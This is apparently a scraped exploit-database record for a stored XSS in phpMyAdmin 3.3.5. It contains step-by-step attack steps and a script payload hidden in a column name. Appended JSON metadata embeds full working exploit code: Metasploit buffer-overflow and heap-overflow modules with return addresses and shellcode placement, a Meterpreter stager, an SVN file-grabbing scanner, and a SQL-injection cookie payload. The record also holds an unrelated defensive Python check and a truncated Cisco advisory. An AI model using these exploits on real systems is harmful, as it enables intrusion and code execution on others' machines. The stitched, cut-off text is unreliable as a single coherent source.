ID 1337DAY-ID-13663 Type zdt Reporter Sid3^effects Modified 2010-08-11T00:00:00
Description
Exploit for php platform in category web applications
==================================
phpMyAdmin 3.3.5 XSS Vulnerability
==================================
I'm Sid3^effects member from Inj3ct0r Team
Name : phpMyAdmin 3.3.5 XSS Vulnerability
Date : August, 11 2010
Affected Versions: its older versions too :P
Vendor Url : http://www.phpmyadmin.net/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability
to directly execute any SQL statement.
###############################################################################################################
Xploit: XSS Vulnerability
The XSS script gets executed by inserting the script in the "Field" section.
Step 1 : Log in to your phpMyAdmin :)
Step 2 : Create new database ... For example w00t
Step 3 : Now create Table
For example
CREATE TABLE `r0ot` (
`id` int(8) NOT NULL auto_increment,
`><script>alert(/inj3ct0r/)</script>` text NOT NULL,
PRIMARY KEY (`id`)
)
Step 4 : Now execute your table :)
You can check here for the latest version :)
DEMO URL: http://demo.phpmyadmin.net/STABLE/
Screenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png
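A defender-side check for the issue described above, as an added example that is not part of the original advisory: it pulls backtick-quoted identifiers out of DDL text, flags those containing HTML metacharacters, and shows a column name written into a table cell with and without output encoding. The function names and the second table (`orders`) are assumptions made for the illustration.

```python
import html
import re

# Backtick-quoted MySQL identifier; a literal backtick inside is written as ``.
IDENT_RE = re.compile(r"`((?:[^`]|``)+)`")

# Characters that change meaning when an identifier is written into HTML unescaped.
HTML_META = set("<>&\"'")

# Constructed sample input: the table definition from the advisory plus a
# benign table (hypothetical) for contrast.
SAMPLE_DDL = """
CREATE TABLE `r0ot` (
`id` int(8) NOT NULL auto_increment,
`><script>alert(/inj3ct0r/)</script>` text NOT NULL,
PRIMARY KEY (`id`)
);
CREATE TABLE `orders` (
`id` int(8) NOT NULL auto_increment,
`customer_name` text NOT NULL,
PRIMARY KEY (`id`)
);
"""


def identifiers(ddl):
    """Return the distinct backtick-quoted identifiers in DDL text, in order."""
    seen = []
    for match in IDENT_RE.finditer(ddl):
        name = match.group(1).replace("``", "`")
        if name not in seen:
            seen.append(name)
    return seen


def risky_identifiers(ddl):
    """Identifiers that contain HTML metacharacters and so need encoding on output."""
    return [name for name in identifiers(ddl) if HTML_META & set(name)]


def render_cell_unsafe(name):
    """The flawed pattern: the identifier is concatenated into markup as-is."""
    return "<td>" + name + "</td>"


def render_cell_safe(name):
    """The fix: encode the identifier for the HTML context before output."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


if __name__ == "__main__":
    for name in risky_identifiers(SAMPLE_DDL):
        print("flagged identifier:", repr(name))
        print("  unescaped cell:", render_cell_unsafe(name))
        print("  escaped cell:  ", render_cell_safe(name))
```

The flag list is for auditing schema dumps; the actual fix is the encoding step, which must be applied wherever database, table or column names are written into a page.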
###############################################################################################################
# 0day no more
# Sid3^effects
{"published": "2010-08-11T00:00:00", "id": "1337DAY-ID-13663", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:28:46", "bulletin": {"published": "2010-08-11T00:00:00", "id": "1337DAY-ID-13663", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.0, "modified": "2016-04-19T23:28:46"}}, "hash": "4fe1ec86d86572d8743d7263082b0bf77ef7690d2023dad51d234494e3f3b4e4", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:28:46", "edition": 1, "title": "phpMyAdmin 3.3.5 XSS Vulnerability", "href": "http://0day.today/exploit/description/13663", "modified": "2010-08-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13663", "references": [], "reporter": "Sid3^effects", "sourceData": "==================================\r\nphpMyAdmin 3.3.5 XSS Vulnerability\r\n==================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 
1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : phpMyAdmin 3.3.5 XSS Vulnerability\r\nDate : August, 11 2010\r\nAffected Versions: its older versions too :P\r\nVendor Url : http://www.phpmyadmin.net/\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr\r\ngreetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz\r\n#######################################################################################################\r\nDescription :\r\nphpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.\r\n\r\nphpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user\r\n\r\ninterface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability\r\n\r\nto directly execute any SQL statement.\r\n###############################################################################################################\r\nXploit: XSS Vulnerability \r\n \r\nThe xss script gets executed by inserting the script in the \"Field\" section. \r\n\r\nStep 1 : Login to your phpmyadmin :)\r\n\r\nStep 2 : Create new database ... 
For example w00t\r\n\r\nStep 3 : Now create Table\r\n\r\nFor example\r\nCREATE TABLE `r0ot` (\r\n`id` int(8) NOT NULL auto_increment,\r\n`><script>alert(/inj3ct0r/)</script>` text NOT NULL,\r\nPRIMARY KEY (`id`)\r\n)\r\n\r\nStep 4 : NOw execute your table :)\r\n\r\nyou can check here for the latest version :)\r\nDEMO URL: http://demo.phpmyadmin.net/STABLE/\r\n\r\nScreenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "da1c4fb53d50d9c42d032ae62780dcab", "key": "reporter"}, {"hash": "7b7200d0272b002f7438b6e54956ef9a", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d713a6e4624bd0fc5f721866689afdce", "key": "href"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "published"}, {"hash": "4f543288f6f8265ac53f09a3438325fc", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "40e0ac586be439b67d65a41d8582719b", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "8e0769e3a873f621c94f021f8c075b13876139d4dc6b3fb36ca38a92ca96814b", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-03-06T01:36:54"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-4006"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13663", "SECURITYVULNS:VULN:6183"]}], "modified": "2018-03-06T01:36:54"}, "vulnersScore": 0.0}, "type": 
"zdt", "lastseen": "2018-03-06T01:36:54", "edition": 2, "title": "phpMyAdmin 3.3.5 XSS Vulnerability", "href": "https://0day.today/exploit/description/13663", "modified": "2010-08-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/13663", "references": [], "reporter": "Sid3^effects", "sourceData": "==================================\r\nphpMyAdmin 3.3.5 XSS Vulnerability\r\n==================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 
1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : phpMyAdmin 3.3.5 XSS Vulnerability\r\nDate : August, 11 2010\r\nAffected Versions: its older versions too :P\r\nVendor Url : http://www.phpmyadmin.net/\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr\r\ngreetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz\r\n#######################################################################################################\r\nDescription :\r\nphpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.\r\n\r\nphpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user\r\n\r\ninterface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability\r\n\r\nto directly execute any SQL statement.\r\n###############################################################################################################\r\nXploit: XSS Vulnerability \r\n \r\nThe xss script gets executed by inserting the script in the \"Field\" section. \r\n\r\nStep 1 : Login to your phpmyadmin :)\r\n\r\nStep 2 : Create new database ... 
For example w00t\r\n\r\nStep 3 : Now create Table\r\n\r\nFor example\r\nCREATE TABLE `r0ot` (\r\n`id` int(8) NOT NULL auto_increment,\r\n`><script>alert(/inj3ct0r/)</script>` text NOT NULL,\r\nPRIMARY KEY (`id`)\r\n)\r\n\r\nStep 4 : NOw execute your table :)\r\n\r\nyou can check here for the latest version :)\r\nDEMO URL: http://demo.phpmyadmin.net/STABLE/\r\n\r\nScreenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2018-03-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a603be8a5638fd5b11cc1ea3299676e4", "key": "href"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "modified"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "da1c4fb53d50d9c42d032ae62780dcab", "key": "reporter"}, {"hash": "023c106fe0b934f4e9efccd6ceea92d9", "key": "sourceData"}, {"hash": "deb76576290ed25c77d67ba04f480f49", "key": "sourceHref"}, {"hash": "40e0ac586be439b67d65a41d8582719b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-29T07:45:08", "bulletinFamily": "exploit", "description": "Scan for servers that allow access to the SVN wc.db file. Based on the work by Tim Meddin.\n", "modified": "2017-07-24T13:26:21", "published": "2012-12-06T21:30:23", "id": "MSF:AUXILIARY/SCANNER/HTTP/SVN_WCDB_SCANNER", "href": "", "type": "metasploit", "title": "SVN wc.db Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SVN wc.db Scanner',\n 'Description' => %q{\n Scan for servers that allow access to the SVN wc.db file.\n Based on the work by Tim Meddin.\n },\n 'Author' =>\n [\n 'Stephen Haywood <stephen[at]averagesecurityguy.info>',\n ],\n 'References' =>\n [\n ['URL', 'http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#']\n ],\n 'License' => MSF_LICENSE\n )\n\n register_advanced_options(\n [\n OptString.new('TARGETURI', [false, 'Base path to the .svn directory', '/.svn/'])\n ])\n end\n\n def run_host(ip)\n base_path = target_uri.path\n get_wcdb(normalize_uri(base_path, 'wc.db'))\n end\n\n def get_wcdb(path)\n proto = (ssl ? 'https://' : 'http://')\n vprint_status(\"Trying #{proto}#{vhost}:#{rport}#{path}\")\n begin\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => path,\n 'ctype' => 'text/plain'\n }\n )\n\n if res and res.code == 200\n print_good(\"SVN wc.db database found on #{vhost}:#{rport}\")\n\n file = store_loot(\n \"svn.wcdb.database\",\n \"application/octet-stream\",\n vhost,\n res.body,\n \"wc.db\",\n \"SVN wc.db database\"\n )\n\n print_good(\"SVN wc.db database stored in #{file}\")\n\n report_note(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => (ssl ? 
'https' : 'http'),\n :type => 'svn_wc_database',\n :data => \"SVN wc.db database is stored in #{file}\"\n )\n else\n vprint_error(\"SVN wc.db database not found on #{vhost}:#{rport}\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb"}, {"lastseen": "2019-11-26T09:58:55", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.\n", "modified": "2017-07-24T13:26:21", "published": "2008-04-06T10:45:29", "id": "MSF:EXPLOIT/WINDOWS/TELNET/GOODTECH_TELNET", "href": "", "type": "metasploit", "title": "GoodTech Telnet Server Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GoodTech Telnet Server Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. 
By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2005-0768' ],\n [ 'OSVDB', '14806'],\n [ 'BID', '12815' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],\n [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(2380)\n ])\n end\n\n def exploit\n connect\n\n sploit = rand_text_english(10020, payload_badchars)\n seh = generate_seh_payload(target.ret)\n\n sploit[10012, seh.length] = seh\n\n print_status(\"Trying target #{target.name}...\")\n\n sock.put(sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/telnet/goodtech_telnet.rb"}, {"lastseen": "2019-11-26T10:23:04", "bulletinFamily": "exploit", "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Listen for a connection (Windows x86)\n", "modified": "2017-07-24T13:26:21", "published": "2007-02-18T00:10:39", "id": "MSF:PAYLOAD/WINDOWS/METERPRETER/BIND_TCP", "href": "", "type": "metasploit", "title": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 285\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager (Windows x86)',\n 'Description' => 'Listen for a connection (Windows x86)',\n 'Author' => ['hdm', 'skape', 'sf'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_tcp.rb"}, {"lastseen": "2019-12-07T16:36:21", "bulletinFamily": "exploit", "description": "This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. 
Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.\n", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T04:57:41", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/UNIVERSAL_AGENT", "href": "", "type": "metasploit", "title": "CA BrightStor Universal Agent Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor Universal Agent Overflow',\n 'Description' => %q{\n This module exploits a convoluted heap overflow in the CA\n BrightStor Universal Agent service. Triple userland\n exception results in heap growth and execution of\n dereferenced function pointer at a specified address.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-1018'],\n [ 'OSVDB', '15471' ],\n [ 'BID', '13102'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)\n 'Space' => 164,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'Magic Heap Target #1',\n {\n 'Platform' => 'win',\n 'Ret' => 0x01625c44, # We grow to our own return address\n },\n ],\n ],\n 'DisclosureDate' => 'Apr 11 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6050)\n ])\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n # The server reverses four bytes starting at offset 0xa5 :0\n\n # Create the overflow string\n boom = 'X' * 1024\n\n # Required field to trigger the fault\n boom[248, 2] = [1000].pack('V')\n\n # The shellcode, limited to 250 bytes (no nulls)\n 
boom[256, payload.encoded.length] = payload.encoded\n\n # This should point to itself\n boom[576, 4] = [target.ret].pack('V')\n\n # This points to the code below\n boom[580, 4] = [target.ret + 8].pack('V')\n\n # We have 95 bytes, use it to hop back to shellcode\n boom[584, 6] = \"\\x68\" + [target.ret - 320].pack('V') + \"\\xc3\"\n\n # Stick the protocol header in front of our request\n req = \"\\x00\\x00\\x00\\x00\\x03\\x20\\xa8\\x02\" + boom\n\n # We keep making new connections and triggering the fault until\n # the heap is grown to encompass our known return address. Once\n # this address has been allocated and filled, each subsequent\n # request will result in our shellcode being executed.\n\n 1.upto(200) {|i|\n connect\n print_status(\"Sending request #{i} of 200...\") if (i % 10) == 0\n sock.put(req)\n disconnect\n\n # Give the process time to recover from each exception\n select(nil,nil,nil,0.1);\n }\n\n handler\n end\nend\n\n\n__END__\n012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]\n012a0d97 83c404 add esp,0x4\n012a0d9a 85c9 test ecx,ecx\n012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)\n012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????\n012a0da0 6a01 push 0x1\n012a0da2 ff5204 call dword ptr [edx+0x4]\n\nEach request will result in another chunk being allocated, the exception\ncauses these chunks to never be freed. The large chunk size allows us to\npredict the location of our buffer and grow our buffer to where we need it.\n\nIf these addresses do not match up, run this exploit, then attach with WinDbg:\n\n> s 0 Lfffffff 0x44 0x5c 0x61 0x01\n\nFigure out the pattern, replace the return address, restart the service,\nand run it through again. 
Only tested on WinXP SP1\n\n011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n[ snip ]\n01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/universal_agent.rb"}], "zdt": [{"lastseen": "2018-03-13T01:17:19", "bulletinFamily": 
"exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-01T00:00:00", "published": "2008-11-01T00:00:00", "id": "1337DAY-ID-4006", "href": "https://0day.today/exploit/description/4006", "type": "zdt", "title": "Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling", "sourceData": "=================================================================\r\nBloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling\r\n=================================================================\r\n\r\n\r\n# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling\r\n# url: http://mywebland.com/download.php?id=20\r\n#\r\n# Author: JosS\r\n#\r\n# This was written for educational purpose. Use it at your own risk.\r\n# Author will be not responsible for any damage.\r\n\r\nvuln file: /genscode.php\r\nvuln code:\r\n39: $user_ip = $_SERVER['REMOTE_ADDR'];\r\n define('COMMENT_COOKIE', md5($user_ip));\r\n if(isset($_COOKIE[COMMENT_COOKIE])) {\r\nxx: ...\r\n $comment_cookie = $_COOKIE[COMMENT_COOKIE];\r\n55: $sql = \"SELECT * FROM \".SCODE_TBL.\" WHERE cookie = '\".$comment_cookie.\"'\";\r\n\r\nexploit:\r\njavascript:document.cookie = \"f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/\";\r\n\r\nHack0wn :D\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4006"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nCisco Security Advisory: \r\nWindows VPN Client Local Privilege Escalation Vulnerability\r\n\r\nDocument ID: 70332\r\n\r\nAdvisory ID: cisco-sa-20060524-vpnclient\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml\r\n\r\nRevision 2.0\r\n\r\nLast Updated 2006 July 27 2000 UTC (GMT)\r\n\r\nFor Public Release 2006 May 24 1600 UTC (GMT)\r\n\r\n- 
-----------------------------------------------------------------------\r\n\r\nContents\r\n========\r\n\r\n Summary\r\n Affected Products\r\n Details\r\n Impact\r\n Software Versions and Fixes\r\n Workarounds\r\n Obtaining Fixed Software\r\n Exploitation and Public Announcements\r\n Status of This Notice: FINAL\r\n Distribution\r\n Revision History\r\n Cisco Security Procedures\r\n\r\n- -----------------------------------------------------------------------\r\n\r\nSummary\r\n=======\r\n\r\nThe Cisco VPN Client for Windows is affected by a local privilege\r\nescalation vulnerability that allows non-privileged users to gain\r\nadministrative privileges.\r\n\r\nA user needs to authenticate and start an interactive Windows session\r\nto be able to exploit this vulnerability.\r\n\r\nCisco has made free software available to address this vulnerability\r\nfor affected customers. There is a workaround available to mitigate the\r\neffects of the vulnerability.\r\n\r\nThis advisory is posted at \r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following versions of the Cisco VPN Client for Windows (excluding\r\nWindows 9x users) are affected:\r\n\r\n * 2.x\r\n * 3.x\r\n * 4.0.x\r\n * 4.6.x\r\n * 4.7.x with the exception of version 4.7.00.0533 (see below in\r\n Products Confirmed Not Vulnerable.)\r\n * 4.8.00.x\r\n\r\nProducts Confirmed Not 